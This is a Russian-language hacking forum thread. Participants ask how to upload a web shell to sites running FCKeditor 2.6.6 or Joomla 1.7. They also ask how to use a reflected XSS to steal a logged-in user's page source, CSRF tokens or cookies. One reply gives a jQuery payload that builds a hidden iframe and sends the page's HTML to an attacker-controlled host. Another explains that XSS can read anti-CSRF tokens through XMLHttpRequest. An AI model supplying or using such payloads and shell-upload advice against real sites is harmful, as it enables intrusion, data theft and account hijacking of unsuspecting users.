Да вообще не грузит P.S. Можно залить ли шелл в fckeditor 2.6.6 только .htaccess уже есть в папках? magic_quotes_gpc Off
на сайте есть пассивка, можно ли вытащить сурс код странички залогиненого юзера(некий xsrf) и передать/записать на сервер
Пассивная/активная без разницы, ты должен понимать что javascript работает на стороне клиента. Если самописный движок ты должен будешь изучить его, чтобы провести XSRF. Там нету возможности украсть cookies? update: точнее - есть ли там вообща аутентификация, и работает ли она на основе cookies?
есть конечно. и есть возможность воровать куки, естественно. только я преследую цель - сбор некоторых данных, а не кража аккаунтов. зачем изучать двиг, если нужно только взять сурс код? + я прекрасно знаю, про то, на чьей стороне работает js, именно из-за этого возможно получить страницу залогиненого юзера. Js спокойно работает в пределах атакуемого сайта, если у вас нет ничего по-существу вопроса, давайте не будем офтопить, спасибо. я преследую не чистый xsrf, а лишь "некое" подобие)
Давай не умничай уже. Если тебе нужны сорсы движка, ты должен с помощью XSRF воспользоваться функцией этого движка, для нужных тебе операций, если такие функция вообще существуют. Если ты прекрасно знаешь на чей стороне работает javascript, то ты прекрасно должен знать на чей стороне работает PHP/ASP/PYTHON. Тоже мне умник.
друг мой, ты меня очень недооцениваешь. улови логическую связь между "сурс страницы залогиненого юзера" и jsом. тут ни слова о исходниках движка. читайте, пожалста, вникая в текст. а не верхами.
простите ради Бога) Все думал, что тебе нужны сорсы со сторoны сервера. В таком случаи советую копать в сторону: Code: document.getElementById('id').childNodes; document.getElementById('id').getElementsByTagNamе; Я как понимаю, тебе не будут нужны все сорсы этой страницы, а только определенная часть, поэтому можно воспользоватся javascript.
если я правильно понил, что-то типа того (если на целевом сайте подключен jQuery, впрочем если нет, то через ту же пассивку его можно и подключить): Code: $('<iframe width="0" height="0" src="'+'http://your.site.com/src='+$('html').html()+' "></frame>').insertBefore('div:eq(0)');
токен пытаешся чтоли вытащить? или полный сурс? Если есть возможность использовать XSS (именно на этой а не на другой странице сайта )то можно, если ксска на другой странице- и у тебя получится вытянуть токен- можеш на нобелевскую подавать (я сам когдато над этой задачей провел ниодну бесонную ночь)
не очень понимаю в чем проблема, если та (другая страница) на том же домене, то можно открыть iframe с той страницей и также как выше я указал отправить html-содержимое
где-то тут м_скрипт говорил, что если есть пассивка, то токены не спасут) и говорил действовать через xmlrequest
Ты все еще не разборался с этим. Тебе что именно нужно будет вытащить, все сорсы или токены, или какие нибудь другие определенные элементы? Да кстати, M_script прав, токены не спасут от пассивки, если атакующий знает с каким названием токен находится в документе.
Вопрос номер раз: Есть ли где подробное описание, как использовать post xss (никак не могу разобраться... есть пассивка на почтовике, где в строке поиска нужно ввести скрипт и нажать enter - как на практике ей угнать кукисы?) Вопрос номер два как можно зaлить шелл (сайт на джyмлe 1.7)? Jskу нашел там вот что: Code: Possible secsitive directories - 1125 Directories with EXECUTE permission enabled - 17 Possible sensitive files - 15 Directory backup check - 16 File backup check - 274